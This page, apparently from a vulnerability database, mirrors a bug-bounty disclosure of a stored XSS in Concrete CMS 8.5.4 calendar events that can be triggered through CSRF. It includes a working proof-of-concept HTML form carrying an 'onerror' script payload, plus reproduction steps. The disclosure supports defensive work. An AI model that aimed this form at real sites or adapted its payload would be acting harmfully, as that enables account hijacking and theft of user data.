Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneD3addogH1:1102018
HistoryFeb 12, 2021 - 8:43 a.m.

Concrete CMS: Stored unauth XSS in calendar event via CSRF

2021-02-1208:43:11
d3addog
hackerone.com
28

0.001 Low

EPSS

Percentile

30.9%

JSON

crayons

Description

The description parameter in the scenario /index.php/ccm/calendar/dialogs/event/add/save is affected by Stored XSS due to lack of user supplied data filtration. Also in should be mentioned that this endpoint does not verify CSRF token ccm_token, which leads to an ability to perform CSRF attack using specially crafted web page.

Testing setup :

Concrete5 CMS version: 8.5.4
PHP Version: 7.2.24

Steps to reproduce

  1. Login to your privileged account
  2. Create a web page containing following code (do not forget to change form action URL to your testing server)
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://<YOUR CONCRETE5 TESTING SERVER IP>/index.php/ccm/calendar/dialogs/event/add/save" method="POST">
      <input type="hidden" name="caID" value="1" />
      <input type="hidden" name="name" value="csrf_xss" />
      <input type="hidden" name="description" value="<img src=x onerror=alert(document.domain)>" />
      <input type="hidden" name="cID" value="0" />
      <input type="hidden" name="event_repetitionSetID[]" value="1234" />
      <input type="hidden" name="event_repetitionID_1234" value="0" />
      <input type="hidden" name="event_pdStartDate_pub_1234" value="2/12/21" />
      <input type="hidden" name="event_pdStartDate_1234" value="2021-02-12" />
      <input type="hidden" name="event_pdStartDateSelectTime_1234" value="11:00am" />
      <input type="hidden" name="publishAction" value="approve" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  1. Open the web page from Step 2 in the same browser, where you have logged in account from step 1 and click “Submit request” button
  2. Navigate to calendar tab select created event and click “Details”.
  3. After opening “details” XSS will fired

Credits

This bug was found as a part of Solar Security CMS Reseach, with https://hackerone.com/d0bby, https://hackerone.com/wezery0, https://hackerone.com/silvereniqma in collaboration. Can you, please, add them to this report?

Impact

Malicious attacker can potentially obtain sensitive information or make action on user behalf.

Related

cnvd 1
cve 1
cvelist 1
prion 1
nvd 1
openvas 1
cnvd
cnvd
PortlandLabs Concrete CMS Cross-site Request Forgery Vulnerability (CNVD-2021-76080)
2021-09-29 00:00:00
cve
cve
CVE-2021-40108
2021-09-27 13:15:08
cvelist
cvelist
CVE-2021-40108
2021-09-27 12:01:34
prion
prion
Cross site request forgery (csrf)
2021-09-27 13:15:00
nvd
nvd
CVE-2021-40108
2021-09-27 13:15:08
openvas
openvas
Concrete CMS < 8.5.6 Multiple Vulnerabilities
2021-10-05 00:00:00

0.001 Low

EPSS

Percentile

30.9%

JSON
Related for H1:1102018
cnvd1cve1cvelist1prion1nvd1openvas1